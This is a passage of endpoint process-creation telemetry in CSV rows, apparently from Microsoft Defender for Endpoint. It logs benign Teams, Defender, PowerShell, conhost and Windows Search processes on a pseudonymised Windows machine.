20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+697,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:16:49.134962700+00:00,17040,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:16:49.188678400+00:00,2021-06-24 11:18:23.914676700+00:00,5f9a104e-605e-41c2-8d64-ae86ea8dacd0,computerpii_0a470890c60768167990033d701e7bd881398861,180102,False,10.7740.19041.1052,False,11540474045177893,,11540474045178009,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,Teams.exe,1656,256,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+698,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:17:29.369534900+00:00,21176,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:17:29.382210900+00:00,2021-06-24 11:18:23.914785600+00:00,7ee4ae48-4a79-4edd-9a4a-5222c959a2a9,computerpii_0a470890c60768167990033d701e7bd881398861,180104,False,10.7740.19041.1052,False,11540474045177893,,11540474045178011,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+699,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:55:16.210663100+00:00,19080,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4532"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:55:16.873056600+00:00,2021-06-23 02:57:23.149590200+00:00,432337d9-459a-48d8-af77-dbc8034acaa5,computerpii_0a470890c60768167990033d701e7bd881398861,160066,False,10.7740.19041.1052,False,11540474045137006,,11540474045172860,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+700,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:55:26.336642600+00:00,9504,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'fbfc5539be8807216f736a52ee593d6803721374427cf7786b7abb40e4bc4bdd')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 02:55:16.210663100+00:00,19080,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4532"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:55:26.429775+00:00,2021-06-23 02:57:23.150656600+00:00,cfa91d06-11af-4b16-96fb-44694f6db778,computerpii_0a470890c60768167990033d701e7bd881398861,160085,False,10.7740.19041.1052,False,11540474045172860,,11540474045172861,2021-06-23 02:55:16.210663100+00:00,19080,2021-06-23 02:55:16.210663100+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,19080,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+701,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:55:26.430096600+00:00,19136,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 02:55:26.336642600+00:00,9504,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'fbfc5539be8807216f736a52ee593d6803721374427cf7786b7abb40e4bc4bdd')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_205d42406d952a4bd6298fd0e29dbbaf16432c34.ps1' }""",True,2021-06-23 02:55:16.210663100+00:00,19080,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:55:26.687038300+00:00,2021-06-23 02:57:23.150705100+00:00,6fc54911-7766-4857-bf03-a6e42de81f88,computerpii_0a470890c60768167990033d701e7bd881398861,160086,False,10.7740.19041.1052,False,11540474045172861,,11540474045172862,2021-06-23 02:55:26.336642600+00:00,9504,2021-06-23 02:55:26.336642600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,9504,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+702,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 02:55:59.988883300+00:00,7120,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 49556F89-CA5D-3CC0-66B0-0A277AD4A827 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:56:00.727097200+00:00,2021-06-23 02:57:23.155887400+00:00,77825a3b-5564-47ec-9be1-9e363aaf18ca,computerpii_0a470890c60768167990033d701e7bd881398861,160188,False,10.7740.19041.1052,False,11540474045145394,,11540474045172866,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+703,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:14:44.689374200+00:00,10232,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320755_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320755 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:14:44.794425300+00:00,2021-06-24 02:16:27.512555500+00:00,7f6d47c2-89d3-493d-9633-318152e1d914,computerpii_0a470890c60768167990033d701e7bd881398861,173066,False,10.7740.19041.1052,False,11540474045144190,,11540474045175957,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,SearchIndexer.exe,4660,256,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+704,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.284103300+00:00,20516,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdVerification",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.352390+00:00,2021-06-24 01:13:23.016681+00:00,92f7e192-11d7-407a-9b74-9c2ee394dc39,computerpii_0a470890c60768167990033d701e7bd881398861,170162,False,10.7740.19041.1052,False,11540474045136925,,11540474045175517,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+705,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.297118300+00:00,21156,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCacheMaintenance",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.353639100+00:00,2021-06-24 01:13:23.016762400+00:00,69aef436-be07-4aab-acd5-e507adc4ed5e,computerpii_0a470890c60768167990033d701e7bd881398861,170163,False,10.7740.19041.1052,False,11540474045136925,,11540474045175518,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+706,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.302704100+00:00,10852,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdCleanup",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:10:56.353896800+00:00,2021-06-24 01:13:23.016872500+00:00,0c09efb8-20f6-4e50-8089-71a0fad9eb44,computerpii_0a470890c60768167990033d701e7bd881398861,170164,False,10.7740.19041.1052,False,11540474045136925,,11540474045175519,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+707,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:10:56.332371500+00:00,21420,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:10:56.284103300+00:00,20516,MpCmdRun.exe,"""MpCmdRun.exe"" -IdleTask -TaskName WdVerification",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 